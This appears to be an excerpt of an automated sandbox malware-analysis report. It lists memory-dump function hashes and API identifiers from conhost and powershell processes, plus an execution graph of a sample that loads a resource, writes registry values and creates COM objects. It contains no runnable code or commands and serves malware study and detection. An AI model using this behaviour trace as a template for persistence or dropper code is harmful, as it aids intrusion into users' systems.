                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModule
                              • String ID:
                              • API String ID: 1092925422-0
                              • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction ID: 77d6beb3827fc4007d5082d6a36ef5fce223a697c2f6b545a2ba2b3bcb12258c
                              • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction Fuzzy Hash: F7116D3A60474287EB248B21E40865AB7B0FB45B89F54003FDE4D03FA5EB7EC964C781
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                              • String ID: csm
                              • API String ID: 2395640692-1018135373
                              • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction ID: fd64d4b9173b6c4b5c726f626cd4bbbbbf45d93dd439c2fdec5866d141586114
                              • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction Fuzzy Hash: E051263A3016128EDB54CF56E40CB6C37A5F354B89F65423AEA4A87F88DB7CC841C711
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: CallEncodePointerTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3544855599-2084237596
                              • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction ID: 6382f2f05a751dd2407cb8d27d9d6a32a87eaa0902f8911aae7d2be2088968de
                              • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction Fuzzy Hash: 4361AD76508BC589EB209F1AE44439AB7A0F785B99F14423AEBD817F99DB7CC190CB01
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction ID: 7c19ee43088724e99f7ad399caf016a9441aa18842a2d58e39d8785fb435e873
                              • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction Fuzzy Hash: 8D516E3A2006828FEB74AF26954835877A5F354B96F24413BEA9947FD5CB38C490CB02
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd
                              Similarity
                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction ID: 6cb3a4d760e140562a7ea21ebdb5dec55e3a0a13240db634c1a6d3229f02a9c7
                              • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction Fuzzy Hash: 6B516E3A20478A8EEB748F26D54C36877A0F355B98F28413BDA9947FD5CB38D460CB02
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID: pid_
                              • API String ID: 517849248-4147670505
                              • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction ID: 8e49c6c0f9c788b2ceb326d6141eaf42c6f395e511a0c9958818fa81f7a43e85
                              • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                              • Instruction Fuzzy Hash: DA118139310B8395EB109B25E80979A73A4FB44782FA4403F9E59C3FA9EF78C955C741
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: FileWrite$ConsoleErrorLastOutput
                              • String ID:
                              • API String ID: 2718003287-0
                              • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction ID: 8a40d939716c1c8ca4807348dd281156784480d89b7dd517a8a6d7e4e89d6b12
                              • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                              • Instruction Fuzzy Hash: B0D1B93AB14A8589E710CFA5D4482AC3BB9F354B9CF60423ACE5DA7F99DB34C116C341
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Heap$Process$Free
                              • String ID:
                              • API String ID: 3168794593-0
                              • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction ID: 327847b80f9113b73772ccbc390ab9b54c0d0d66ccdedd2e476f38a0508ab9a6
                              • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                              • Instruction Fuzzy Hash: 2B011736A10E91DAE714DF66A80914977B1F788F84B29403EDB4953B28DF34D461C781
                              APIs
                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002BCD7E428DF), ref: 000002BCD7E42A12
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: ConsoleMode
                              • String ID:
                              • API String ID: 4145635619-0
                              • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction ID: c9948afdf8e7e1eaf487a55c046ba97114bd0e55ae711aafc18c19ef510a1c82
                              • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                              • Instruction Fuzzy Hash: E591EF3AA106568DFB608FA5D8583AD3BA4B348B9CF64413FDE4A63F85DB34C495C302
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 2933794660-0
                              • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction ID: aee8d5204580b84bcdbd460cde646327ffcf192220f782128c38054e2cad3c8a
                              • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                              • Instruction Fuzzy Hash: B5112E3A710F058AEB00CF60E8593A933B4F719758F540E3AEA6D86BA4DB78C164C381
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction ID: 94418ce2fcf23f2d7366e151e89398a22eab573ec6af2d096b38897999a98d24
                              • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                              • Instruction Fuzzy Hash: DC71B33A200B834AE7349E2AD8583AA7798F385796F65403FDE9987F99DF35C500C741
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritable__except_validate_context_record
                              • String ID: csm
                              • API String ID: 3242871069-1018135373
                              • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction ID: 592a2f882507b8bb5f31254a3c2955ec8dd4b1f454317bbd4f06af0b569f48a4
                              • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction Fuzzy Hash: 8151C33A312A22CEEB54CF65E44CB6D3791F754B98F25853ADE8A47B88DB78C841C701
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd
                              Similarity
                              • API ID: CallTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3163161869-2084237596
                              • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction ID: 01fd0f3e5a3c714c2ba62ad6c0392f1de5846a5a7e910a21d7e4d3351a50f75a
                              • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction Fuzzy Hash: DF61C076508BC58AEB708F15E44839AB7A0F795B98F14423AEB9807F99CB7CC190CB01
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: FileType
                              • String ID: \\.\pipe\
                              • API String ID: 3081899298-91387939
                              • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction ID: 631c9d5d29bdac8509c9ca77f86a8a3ef35000b341ce568978f80f53347d25e4
                              • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                              • Instruction Fuzzy Hash: D751043E20479389EA248E29E45C3AA7799F785B82F74003FCE9943F99DB39C404C742
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: ErrorFileLastWrite
                              • String ID: U
                              • API String ID: 442123175-4171548499
                              • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction ID: bce6f853d40ad632659a3ba5209567686dd6bd72b8288ce9274302359267c25a
                              • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                              • Instruction Fuzzy Hash: 9941E636625A858AE710CF65E44C79AB7A4F388798FA0413AEE4D87B58EB38C451CB41
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: ExceptionFileHeaderRaise
                              • String ID: csm
                              • API String ID: 2573137834-1018135373
                              • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction ID: c97a3774cc7d355b0db14948a0bc98f5062b051c7691289a82a2681ec75315da
                              • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                              • Instruction Fuzzy Hash: D2112B36614B8186EB218B25F448259B7E5F788B98F69423AEE8D07F68DF3CC551CB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID:
                              • API String ID: 756756679-0
                              • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction ID: a0a8107df1f78fac9e92611b823da64947a442bdf788cf292b9005918cec1d14
                              • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                              • Instruction Fuzzy Hash: 77118439A01F8189EA14CB66A40925977B0F789FD5F68813DDE4E93B65DF38D452C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction ID: 618dde896c07c5ba486079774e8e52b1625a0b774cd95c99af762bb85c54dc37
                              • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction Fuzzy Hash: 7DE03235A01A059AE7288B62D80934937E1EB88B49F58803CC90907760EF7DC4A9CB91
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction ID: 4e31dccd67dfb38ba59fe6b5f9a56ea0f5fe1b1af33822cb87c64c51fdeac8d9
                              • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction Fuzzy Hash: 63E06D75A119049AE7188B22D80924833B1FB88B49F548039C90907710EF3884A8D651
                              Memory Dump Source
                              • Source File: 00000021.00000002.2434584908.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_342d000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d5266aa5bc9641d0ed6c5610520ac736294ef4d3cc368b7bb52c4e4ff642c8c5
                              • Instruction ID: 809e59e361374ed38d709203145a49ac932d6f204f552b1fa7835272554ed4e7
                              • Opcode Fuzzy Hash: d5266aa5bc9641d0ed6c5610520ac736294ef4d3cc368b7bb52c4e4ff642c8c5
                              • Instruction Fuzzy Hash: 4A012D7240E3D09ED7128B258894B52BFB4DF57224F1D81DBD9889F2A3C2695845C772
                              Memory Dump Source
                              • Source File: 00000021.00000002.2434584908.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_342d000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 54369614fb1c62982558ecd4b76e882c93440c7595f7ccdf37c2067863e8cb0e
                              • Instruction ID: 960fd17d4a2ddf9861dfefbf262733fcee9d3653d5e4073e37d2afb2b16faacb
                              • Opcode Fuzzy Hash: 54369614fb1c62982558ecd4b76e882c93440c7595f7ccdf37c2067863e8cb0e
                              • Instruction Fuzzy Hash: FD01F7718043509AE720CA15CC84B67FFD8DF56329F4CC45BED686F292C6799842C6B5

                              Execution Graph

                              Execution Coverage:74.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:25.7%
                              Total number of Nodes:101
                              Total number of Limit Nodes:9
                              execution_graph 238 401798 241 4017a5 FindResourceA 238->241 242 40179d ExitProcess 241->242 243 4017c5 SizeofResource 241->243 243->242 244 4017d8 LoadResource 243->244 244->242 245 4017e4 LockResource RegOpenKeyExW 244->245 245->242 246 40180b RegSetValueExW 245->246 246->242 247 401822 246->247 259 401868 GetProcessHeap HeapAlloc StrCpyW 247->259 251 401835 252 401674 9 API calls 251->252 253 401841 252->253 306 40112f GetCurrentProcess IsWow64Process 253->306 257 401854 257->242 319 40151a SysAllocString SysAllocString CoInitializeEx 257->319 329 401159 259->329 261 401893 262 4018c5 StrCatW StrCatW 261->262 263 40189d StrCatW 261->263 332 4019e1 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 262->332 264 40112f 2 API calls 263->264 266 4018aa StrCatW StrCatW 264->266 266->262 271 401986 6 API calls 272 4018f0 271->272 273 401986 6 API calls 272->273 274 4018fc 273->274 275 401986 6 API calls 274->275 276 401908 275->276 277 401986 6 API calls 276->277 278 401914 277->278 279 401986 6 API calls 278->279 280 401920 279->280 281 401986 6 API calls 280->281 282 40192c 281->282 283 401986 6 API calls 282->283 284 401938 283->284 285 401986 6 API calls 284->285 286 401944 285->286 287 401986 6 API calls 286->287 288 401950 287->288 289 401986 6 API calls 288->289 290 40195c 289->290 291 401986 6 API calls 290->291 292 401968 291->292 293 401986 6 API calls 292->293 294 401974 293->294 295 401986 6 API calls 294->295 296 401827 295->296 297 401674 SysAllocString SysAllocString CoInitializeEx 296->297 298 401782 297->298 299 4016a7 CoInitializeSecurity 297->299 302 401785 SysFreeString SysFreeString 298->302 300 4016c8 CoCreateInstance 299->300 301 4016bd 299->301 303 4016ea VariantInit 300->303 305 40172d CoUninitialize 300->305 301->300 301->305 302->251 303->305 305->302 307 40114e 306->307 308 4011ad 7 API calls 307->308 309 4014f0 308->309 310 401209 CoInitializeSecurity 308->310 311 4014f3 6 API calls 309->311 312 40122a CoCreateInstance 310->312 313 40121f 310->313 311->257 314 401444 CoUninitialize 312->314 315 40124c VariantInit 312->315 313->312 313->314 314->311 317 40128f 315->317 317->314 318 4013dd VariantInit VariantInit VariantInit 317->318 318->314 320 40154d CoInitializeSecurity 319->320 321 40165f SysFreeString SysFreeString 319->321 322 401563 320->322 323 40156e CoCreateInstance 320->323 321->242 322->323 324 401659 CoUninitialize 322->324 323->324 325 401590 VariantInit 323->325 324->321 326 4015d3 325->326 327 401605 VariantInit 326->327 328 40162b 326->328 327->328 328->324 352 40118e GetModuleHandleA 329->352 331 401178 331->261 355 401000 